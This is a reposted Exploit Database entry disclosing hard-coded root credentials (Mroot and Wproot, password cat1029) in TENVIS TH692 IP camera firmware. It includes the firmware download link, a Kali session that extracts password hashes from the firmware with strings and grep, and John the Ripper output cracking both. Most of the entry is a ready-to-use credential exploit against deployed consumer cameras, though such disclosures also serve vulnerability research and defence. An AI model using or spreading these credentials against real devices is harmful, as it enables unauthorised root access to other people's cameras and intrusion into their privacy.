TH692 Outdoor P2P HD Waterproof IP Camera – Hard-Coded Credentials

• Exploit Database
• 18 阅读

• 作者： DLY
  日期： 2016-04-18
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/39706/

• Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
  Date: 4/16/2016
  Exploit Author: DLY
  Vendor: TENVIS Technology Co., Ltd
  Product: TH692- Outdoor P2P HD Waterproof IP Camera
  Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
  Affected version: TH692C-V. 16.1.16.1.1.4
  firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
  
  user: Mroot
  pass:cat1029
  user:Wproot
  pass: cat1029
  
  root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
  rootpath
  rootfs crc %lx
  ------------------start upgrade rootfs------------------
  ------------------end upgrade rootfs------------------
  bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
  nfsroot
  7root
  Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
  k01000100rootboxnohelp info
  root::0:
  Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
  Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
  nfsroot
  pivot_root
  xswitch_root
  chroot
  nfsroot
  root@kali:~# john --show ipcamhashes
  Mroot:cat1029:0:0::/root:/bin/sh
  Wproot:cat1029:0:0::/root:/bin/sh
  
  2 password hashes cracked, 0 left